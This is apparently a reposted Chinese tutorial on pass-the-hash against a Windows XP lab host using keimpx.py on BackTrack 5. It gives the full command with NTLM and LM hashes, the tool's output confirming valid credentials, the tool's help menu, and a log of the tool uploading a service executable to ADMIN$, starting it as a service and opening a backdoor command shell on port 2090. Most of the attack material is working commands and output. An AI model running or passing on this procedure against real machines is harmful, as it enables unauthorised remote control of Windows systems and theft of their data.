测试目标机器是winxp,ip:192.168.1.5。由于不是域机器,所以事先我关闭了防火墙和使用简单文件共享(打开我的文档->工具->文件夹选项->查看->去掉使用简单文件共享前的√)。 运行命令: root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p 445 -U iishelp --nt=ccf9155e3e7db453aad3b435b51404ee --lm=3dbde697d71690a769204beb12283678 回显(其中以下的红字是让你选择的和我输的命令): This product includes software developed by CORE Security Technologies (http://HdhCmsTestcoresecurity测试数据), Python Impacket library keimpx 0.2 by Bernardo Damele A. G. <bernardo.damele@gmail测试数据> [13:46:20] [INFO] Loading targets [13:46:20] [INFO] Loading credentials [13:46:20] [INFO] Loading domains [13:46:20] [INFO] Loaded 1 unique targets [13:46:20] [INFO] Loaded 1 unique credentials [13:46:20] [INFO] No domains specified, using NULL domain [13:46:20] [INFO] Attacking host 192.168.1.5:445 [13:46:20] [INFO] Valid credentials on 192.168.1.5:445: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee [13:46:20] [INFO] Attack on host 192.168.1.5:445 finished HdhCmsTest2cto测试数据 The credentials worked in total 1 times TARGET SORTED RESULTS: 192.168.1.5:445 iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee USER SORTED RESULTS: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee 192.168.1.5:445 Do you want to get a shell from any of the targets? [Y/n] Which target do you want to connect to? [1] 192.168.1.5:445 > 1 Which credentials do you want to use to connect? [1] iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee > 1 [13:46:35] [INFO] type 'help' for help menu # help Generic options =============== help - show this message verbosity {level} - set verbosity level (0-2) info - list system information exit - terminates the SMB session and exit from the tool Shares options ============== shares - list available shares use {sharename} - connect to an specific share cd {path} - changes the current directory to {path} pwd - shows current remote directory ls {path} - lists all the files in the current directory cat {file} - display content of the selected file download {filename} - downloads the filename from the current path upload {filename} - uploads the filename into the current path mkdir {dirname} - creates the directory under the current path rm {file} - removes the selected file rmdir {dirname} - removes the directory under the current path Services options ================ deploy {service name} {local file} [service args] - deploy remotely a service executable undeploy {service name} {remote file} - undeploy remotely a service executable Shell options ============= shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp Users options ============= users [domain] - list users, optionally for a specific domain pswpolicy [domain] - list password policy, optionally for a specific domain domains - list domains to which the system is part of Registry options (Soon) ================ regread {registry key} - read a registry key regwrite {registry key} {registry value} - add a value to a registry key regdelete {registry key} - delete a registry key # shell [13:47:09] [INFO] Uploading the service executable to 'ADMIN$\urakxn.exe' [13:47:09] [INFO] Connecting to the SVCCTL named pipe [13:47:09] [INFO] Creating the service 'Ynohkb' [13:47:09] [INFO] Starting the service 'Ynohkb' [13:47:09] [INFO] Connecting to backdoor on port 2090, wait.. Microsoft Windows XP [\ufffd\u6c7e 5.1.2600] (C) \ufffd\ufffd\u0228\ufffd\ufffd\ufffd\ufffd 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 摘自 vbs小铺
查看更多关于用bt5下的keimpx.py进行hash注入 - 网站安全 - 自学的详细内容...